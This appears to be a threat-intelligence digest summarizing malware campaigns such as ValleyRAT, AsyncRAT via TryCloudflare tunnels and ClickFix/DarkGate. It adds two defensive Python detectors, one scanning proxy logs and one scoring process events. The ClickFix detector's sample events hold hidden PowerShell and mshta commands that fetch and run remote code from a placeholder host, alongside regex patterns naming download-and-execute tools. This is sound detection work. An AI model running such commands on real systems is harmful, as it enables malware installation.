FinStealer
This article analyzes a malware campaign that targets a leading Indian bank through fake mobile applications, committing financial fraud via credential theft and social engineering. Key tactics include phishing links, dynamically loaded payloads, and encrypted communication with C2 servers. The malware's primary objective is to steal credentials and other sensitive data for financial gain.…
In November 2024, ten hacking groups were detected engaging in various cybercriminal activities, including stealing sensitive information, deploying ransomware, and mining cryptocurrency. Each group employed different methods such as phishing, malware distribution, and obfuscation techniques to achieve their objectives, often targeting companies and individuals across multiple countries.…
Fake Google Chrome Sites Distribute ValleyRAT Malware via DLL Hijacking
Summary: Bogus websites posing as Google Chrome distributors have been employed to spread a remote access trojan known as ValleyRAT, attributed to the Silver Fox threat actor. This malware primarily targets key organizational roles in financial and sales sectors within Chinese-speaking regions, utilizing sophisticated attack chains to deploy other malicious software.…
North Korean APT Kimsuky Uses forceCopy Malware to Steal Browser-Stored Credentials
Summary: The North Korea-affiliated hacking group Kimsuky has been identified as executing spear-phishing attacks using a malware named forceCopy, which targets web browser configuration files for credential theft. Their attacks involve deceptive emails that contain malicious Windows shortcuts leading to secondary payload downloads, including trojans and proxy malware.…
University site cloned to evade ad detection distributes fake Cisco installer
This article discusses the methods attackers use in the online advertising ecosystem, particularly malvertising campaigns. It examines a case in which a fake Google ad for Cisco AnyConnect redirected users to a phishing site and ultimately delivered the NetSupport RAT. The attackers used disguises such as impersonating a legitimate university (cloning its site) and relied on newly registered domains to bypass ad-network detection.…
New ValleyRAT Malware Variant Spreads via Fake Chrome Downloads
Summary: Morphisec Threat Lab has identified a new variant of the ValleyRAT malware that leverages advanced evasion techniques and multi-stage infection methods targeting high-value individuals, especially in finance and sales sectors. This malware is being distributed through phishing emails, messaging platforms, and compromised websites, with a notable new delivery method involving a fake Chinese telecom website.…
AsyncRAT Reloaded: Using Python and TryCloudflare for Malware Delivery Again
The Forcepoint X-Labs research team has uncovered a new AsyncRAT malware campaign that delivers malicious payloads through TryCloudflare quick tunnels and disguised Python packages. The attack starts with a phishing email containing a Dropbox link, which leads to a multi-stage chain of downloads that executes the malware while showing the user a decoy PDF.…
ALPHV Ransomware: Analyzing the BlackCat After Change Healthcare Attack
The ALPHV ransomware group, also known as BlackCat, has emerged as a significant threat operating under a Ransomware-as-a-Service model. In February 2024 it attacked Change Healthcare, a subsidiary of UnitedHealth Group, causing a major healthcare data breach that affected over 100 million individuals. The incident prompted UnitedHealth to pay a ransom.…
AsyncRAT Abusing Python and Cloudflare Tunnels for Stealthy Malware Delivery
Summary: Forcepoint's X-Labs has identified a new malware campaign that combines AsyncRAT, Python scripting, and TryCloudflare tunnels for stealthy payload delivery. The campaign illustrates a growing trend of attackers using legitimate infrastructure to obscure malicious activity. Through a multi-stage infection process, the attackers bypass traditional security controls, underscoring the need for detection that does not rely on the reputation of the hosting domain alone.…
AsyncRAT Campaign Uses Python Payloads and TryCloudflare Tunnels for Stealth Attacks
Summary: A malware campaign delivering the AsyncRAT remote access trojan has been identified using Python payloads and TryCloudflare tunnels. The attackers use phishing emails to initiate the attack, misleading users into downloading malicious payloads that masquerade as legitimate documents and URLs. This campaign highlights the evolving tactics of cybercriminals who use trusted infrastructure to abuse user trust.…
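The fake Cisco AnyConnect ad and the AsyncRAT/TryCloudflare items above turn on the same detection problem: the delivery hosts are either throwaway subdomains of a trusted parent (TryCloudflare quick tunnels) or domains registered days before the campaign. The following is an added example, not code from Forcepoint X-Labs or from any of the articles summarized here. It scans constructed proxy log lines and flags requests to quick-tunnel hostnames and to young domains; the log lines, the domain-age table (a stand-in for a WHOIS/RDAP lookup) and the 30-day threshold are all assumptions made for the example.

```python
"""Added example: flag proxy-log requests to TryCloudflare quick-tunnel
hostnames and to domains registered only days ago. Log lines, the
registration-date table and the threshold are constructed for this example."""
from __future__ import annotations

import re
from datetime import date
from urllib.parse import urlparse

# Quick tunnels created with `cloudflared tunnel --url` get a random label
# under trycloudflare.com; attackers abuse them because the parent domain is
# trusted and the hostname is disposable.
TRYCLOUDFLARE_RE = re.compile(r"^(?:[a-z0-9-]+\.)+trycloudflare\.com$", re.I)

# Constructed stand-in for a WHOIS/RDAP creation-date lookup (illustrative
# values only; a real deployment would query RDAP or a domain-age feed).
DOMAIN_CREATED: dict[str, date] = {
    "cisco.com": date(1987, 5, 14),
    "anyconnect-secure-download.com": date(2025, 1, 28),
    "dropbox.com": date(1996, 5, 17),
}

MAX_DOMAIN_AGE_DAYS = 30  # assumption: tune to your false-positive tolerance


def registrable_domain(host: str) -> str:
    """Crude eTLD+1 (last two labels). Good enough for .com; a real
    deployment should use the public suffix list."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_url(url: str, today: date) -> list[str]:
    """Return the reasons a URL looks like disposable attacker infrastructure."""
    host = urlparse(url).hostname or ""
    reasons: list[str] = []
    if TRYCLOUDFLARE_RE.match(host):
        reasons.append("trycloudflare-quick-tunnel")
    created = DOMAIN_CREATED.get(registrable_domain(host))
    if created is not None:
        age = (today - created).days
        if age <= MAX_DOMAIN_AGE_DAYS:
            reasons.append(f"domain-registered-{age}d-ago")
    return reasons


# Constructed proxy log lines: timestamp, client IP, method, URL, status.
SAMPLE_LOG = """\
2025-02-03T09:14:02Z 10.1.4.22 GET https://www.dropbox.com/scl/fi/abc/invoice.zip?dl=1 200
2025-02-03T09:14:30Z 10.1.4.22 GET https://quiet-birds-listen-rain.trycloudflare.com/py/setup.bat 200
2025-02-03T09:15:11Z 10.1.4.22 GET https://anyconnect-secure-download.com/AnyConnect.exe 200
2025-02-03T09:16:00Z 10.1.4.23 GET https://www.cisco.com/c/en/us/support/security/anyconnect.html 200
"""


def scan_log(text: str, today: date) -> list[tuple[str, str, list[str]]]:
    """Return (client, host, reasons) for every flagged request."""
    hits: list[tuple[str, str, list[str]]] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        client, url = parts[1], parts[3]
        reasons = classify_url(url, today)
        if reasons:
            hits.append((client, urlparse(url).hostname or "", reasons))
    return hits


if __name__ == "__main__":
    for client, host, reasons in scan_log(SAMPLE_LOG, date(2025, 2, 3)):
        print(f"{client} -> {host}: {', '.join(reasons)}")
```

The Dropbox link in the sample is deliberately not flagged: the file-sharing hop in these campaigns lives on a long-established domain, so domain age alone will not catch it, and blocking it outright is rarely acceptable. Correlating the Dropbox download with a follow-on request to a quick-tunnel host from the same client, as the sample shows, is the stronger signal.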
XE Group Cybercrime Gang Moves from Credit Card Skimming to Zero-Day Exploits
Summary: Researchers have found that the Vietnamese cybercrime group XE Group, previously known for credit card skimming, has shifted tactics to exploit zero-day vulnerabilities in the VeraCore enterprise software. The investigation documents their unauthorized access and deployment of malicious tools to exfiltrate data and compromise network security.…
Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions
Summary: Brazilian Windows users are being targeted by a sophisticated banking malware campaign known as Coyote, which performs keylogging, credential theft, and other malicious activity. Initially delivered through LNK files that run PowerShell commands, the malware can extract sensitive information from over 1,030 websites and 73 financial institutions.…
Winterthur Media Outlets Hit by Cyberattack Disrupting Live Broadcasts
Date Reported: 2025-02-02
Country: CHE | Switzerland
Victim: Radio Top, Tele Top
Website: toponline.ch
Information: Winterthur media outlets were targeted in a cyberattack over the weekend. The attack disrupted live broadcasts and production for Radio Top and Tele Top. An encryption Trojan (ransomware) was responsible for the attack, affecting the company's systems.…
ClickFix vs. traditional download in new DarkGate campaign
This article discusses recent malware campaigns that use the "ClickFix" technique, which tricks users into executing malicious code themselves by way of fake CAPTCHA pages. The campaigns impersonate brands such as Notion and use both ClickFix and a traditional file download to deliver the DarkGate malware loader.
Affected: Notion
Keypoints:
Numerous malware campaigns have emerged using the "ClickFix" technique.…
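ClickFix leaves a distinctive trace on the endpoint: the pasted command is launched from the Win+R Run dialog, so a scripting host starts as a child of explorer.exe with a command line that fetches and executes remote content, often padded with a "verification" string so the Run box looks harmless. The following is an added example and not code from the article or from the DarkGate research it summarizes: it scores constructed process-creation events (Sysmon Event ID 1 style fields) for that pattern. The event records, the indicator weights and the threshold are assumptions made for the example.

```python
"""Added example: score Windows process-creation events for the ClickFix
pattern (user pastes a command into Win+R after a fake CAPTCHA page).
Events, indicator weights and threshold are constructed for this example."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Win+R runs the pasted command as a child of explorer.exe; an interactive
# scripting host with that parent is unusual for an ordinary user.
RUN_DIALOG_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "msiexec.exe"}

# Fetch-and-execute indicators seen in pasted ClickFix commands, each with an
# assumed weight. The last pattern catches the decoy text attackers append so
# the Run dialog shows a plausible "verification" string.
INDICATORS = [
    (re.compile(r"\b(iwr|invoke-webrequest|curl|wget|irm|invoke-restmethod)\b", re.I), 2),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), 2),
    (re.compile(r"\bmshta(\.exe)?\s+https?://", re.I), 3),
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), 1),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 2),
    (re.compile(r"\bhttps?://", re.I), 1),
    (re.compile(r"I am not a robot|Verification|CAPTCHA", re.I), 3),
]
THRESHOLD = 3  # assumption: tune against your own baseline


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, matched patterns); 0 unless parent/child shape fits."""
    if basename(ev.parent_image) not in RUN_DIALOG_PARENTS:
        return 0, []
    if basename(ev.image) not in SCRIPT_HOSTS:
        return 0, []
    score, matched = 0, []
    for pat, weight in INDICATORS:
        if pat.search(ev.command_line):
            score += weight
            matched.append(pat.pattern)
    return score, matched


def is_clickfix(ev: ProcEvent) -> bool:
    return score_event(ev)[0] >= THRESHOLD


def find_clickfix(events: list[ProcEvent]) -> list[int]:
    """Indices of events that meet the threshold."""
    return [i for i, ev in enumerate(events) if is_clickfix(ev)]


# Constructed events: two ClickFix-style launches, three benign ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iwr -useb https://example.invalid/a.ps1 | iex" '
              '# "I am not a robot - reCAPTCHA Verification ID: 8241"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/verify.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              r"notepad C:\Users\alice\notes.txt"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "iwr https://updates.example.invalid/x | iex"'),  # scheduled task, not Win+R
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -NoProfile -Command Get-Process"),
]

if __name__ == "__main__":
    for i in find_clickfix(SAMPLE_EVENTS):
        score, matched = score_event(SAMPLE_EVENTS[i])
        print(f"event {i}: score={score} matched={matched}")
```

The fourth sample event is included on purpose: the same fetch-and-execute command line launched by a scheduled task has a different parent and is not scored, which keeps the rule focused on the Run-dialog behaviour rather than on PowerShell download cradles in general. On a real host the RunMRU registry key under the user's hive holds the pasted command as well and is worth collecting alongside the process event.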